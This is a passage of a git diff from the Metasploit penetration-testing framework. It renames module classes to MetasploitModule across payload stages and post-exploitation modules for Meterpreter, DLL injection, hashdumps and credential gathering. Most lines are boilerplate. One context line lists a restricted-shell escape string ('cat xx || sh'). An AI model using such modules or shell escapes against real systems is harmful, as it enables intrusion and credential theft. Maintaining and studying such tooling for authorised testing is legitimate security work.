a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 4b4a7d57a4..884221e514 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -16,7 +16,7 @@ require 'msf/base/sessions/command_shell_options' # Injects the VNC server DLL and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Osx::BundleInject include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index bd6acff024..5dc5b6a4fd 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index 90629b2715..4be5f679e3 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_php' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 3c668327b5..6945059910 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/base/sessions/meterpreter_python' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Payload::Python::MeterpreterLoader diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index a14584d726..2c6a5adc72 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -13,7 +13,7 @@ require 'msf/core/payload/windows/reflectivedllinject' # Injects an arbitrary DLL in the exploited process via a reflective loader. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 2363cb9a45..7d2c7a4fdc 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config' # ### -module Metasploit4 +module MetasploitModule include Msf::Payload::Windows::MeterpreterLoader include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index a96ae18956..9228ccd055 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/dllinject' # Injects an arbitrary DLL in the exploited process. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::DllInject diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index fc66ab5998..3a61de9590 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -14,7 +14,7 @@ require 'msf/base/sessions/meterpreter_options' # Injects the meterpreter server instance DLL via the DLL injection payload. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::DllInject include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 80f95c50f6..4a5f9e9b93 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 1d833ed93a..8d71bd79f7 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 5f78fd44ac..3683471406 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -15,7 +15,7 @@ require 'msf/base/sessions/vncinject_options' # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject include Msf::Sessions::VncInjectOptions diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index 690d4aac11..93127b2728 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config' # ### -module Metasploit4 +module MetasploitModule include Msf::Payload::Windows::MeterpreterLoader_x64 include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 4e511bd5ff..043f12be1a 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 8490da03e2..0b9ef245f4 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/vncinject_options' # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject_x64 include Msf::Sessions::VncInjectOptions diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index dd9de9fc96..fa87300d18 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/android/capture/screen.rb b/modules/post/android/capture/screen.rb index 678d228d01..fd59559c57 100644 --- a/modules/post/android/capture/screen.rb +++ b/modules/post/android/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index 2c21b86270..84087c6e21 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post Rank = NormalRanking include Msf::Post::Common diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb index 1a71658619..0ae5eebf89 100644 --- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Android::Priv diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index 515c7b8595..a6e54b26b8 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/cisco' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Cisco def initialize(info={}) super( update_info( info, diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index 4fc5f6cc6e..759e70c05f 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 932105e952..f35e4e02c8 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index 0009613d36..714b3f5a29 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -7,7 +7,7 @@ require 'json' require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index dbe1b8a48c..978f57a9d9 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb index 5e568c8584..ff87056b00 100644 --- a/modules/post/firefox/manage/webcam_chat.rb +++ b/modules/post/firefox/manage/webcam_chat.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation include Msf::Post::WebRTC diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb index 473c55c7de..47b2ca2e29 100644 --- a/modules/post/linux/busybox/enum_connections.rb +++ b/modules/post/linux/busybox/enum_connections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb index 996a6f377f..0d63021bf6 100644 --- a/modules/post/linux/busybox/enum_hosts.rb +++ b/modules/post/linux/busybox/enum_hosts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index 9db686e65a..71b1d87852 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post METHODS = [ 'cat xx || sh', diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb index 4e1191304b..84c1d280c2 100644 --- a/modules/post/linux/busybox/ping_net.rb +++ b/modules/post/linux/busybox/ping_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb index a2d109cd6b..ee86fec3ee 100644 --- a/modules/post/linux/busybox/set_dmz.rb +++ b/modules/post/linux/busybox/set_dmz.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize super( diff --git a/modules/post/linux/busybox/set_dns.rb b/modules/post/linux/busybox/set_dns.rb index 7732059d03..274b253750 100644 --- a/modules/post/linux/busybox/set_dns.rb +++ b/modules/post/linux/busybox/set_dns.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index f89e57e6c1..4570a66659 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb index 38e90216a0..7a55694dc4 100644 --- a/modules/post/linux/busybox/wget_exec.rb +++ b/modules/post/linux/busybox/wget_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index c3085a1104..d7feb3cfdf 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index 21bbd3f3eb..ca171c856d 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index 8e6ca7cf9d..bff25534cb 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index ba52141294..9fa3847f37 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index ab18a0c403..97d4ea05a8 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_psk.rb b/modules/post/linux/gather/enum_psk.rb index 9edc2a7ada..1afa0fbff1 100644 --- a/modules/post/linux/gather/enum_psk.rb +++ b/modules/post/linux/gather/enum_psk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index e96331fa98..6c9b242fa4 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index 6feeb24323..8eeead4bf4 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index c6a722884d..c4b236a5f4 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index ef049898e8..8956ccb5c1 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index eb049ae7da..6a18d942a1 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb index ed33627410..c7ec0cf23f 100644 --- a/modules/post/linux/gather/mount_cifs_creds.rb +++ b/modules/post/linux/gather/mount_cifs_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb index 2ca64520ce..0cd46d392e 100644 --- a/modules/post/linux/gather/openvpn_credentials.rb +++ b/modules/post/linux/gather/openvpn_credentials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index cbdbfb31dd..ff663ff65f 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index 5e15132d46..548540a9a2 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index 578ae8ba22..195d8fe714 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File LP_GROUPS = ['lpadmin', '_lpadmin'] diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index ab9535c6c3..4466a0e513 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post Rank = ManualRanking include Msf::Post::File diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 31d07e1ba0..2169ad9443 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/apple_backup_manifestdb' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 8a2104215d..a82dd47fda 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' require 'uri' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8c07940817..fd2ced019f 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -8,7 +8,7 @@ require 'msf/core/auxiliary/report' require 'openssl' require 'digest/md5' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3c987cc114..7a09697aa8 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index 8e562b4db8..cf0162c180 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 3ae16da37f..4ceec2f5de 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 283ffbfa7b..f9b60a3204 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 34938cb19b..19d2c67538 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 9b9de9aff2..86d97c0462 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 736c4b9fc3..c793a9b201 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index eb16f3e85b..0382afde76 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index fde3b370a8..7afe0485f9 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -21,7 +21,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 6c296d9118..2dd4f4a106 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index c2b7ebaaaf..687268b39d 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -8,7 +8,7 @@ require 'sqlite3' require 'uri' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Post::OSX::System diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index c16ef69a6c..3f6808328b 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 4bd3f3e381..57bda43abc 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 09c3450e84..2ad6857412 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 437ea9b73a..4d2e4a4ef4 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1c76b839a8..39feb3399d 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index a7f9b7ff42..b8e72f70a5 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/resolve_hosts.rb b/modules/post/multi/gather/resolve_hosts.rb index a5ccaa1a6c..7eefecdb1b 100644 --- a/modules/post/multi/gather/resolve_hosts.rb +++ b/modules/post/multi/gather/resolve_hosts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/rsyncd_creds.rb b/modules/post/multi/gather/rsyncd_creds.rb index ee0736848e..dafcb3aa48 100644 --- a/modules/post/multi/gather/rsyncd_creds.rb +++ b/modules/post/multi/gather/rsyncd_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index bd732bdbe5..422ccce460 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/run_console_rc_file.rb 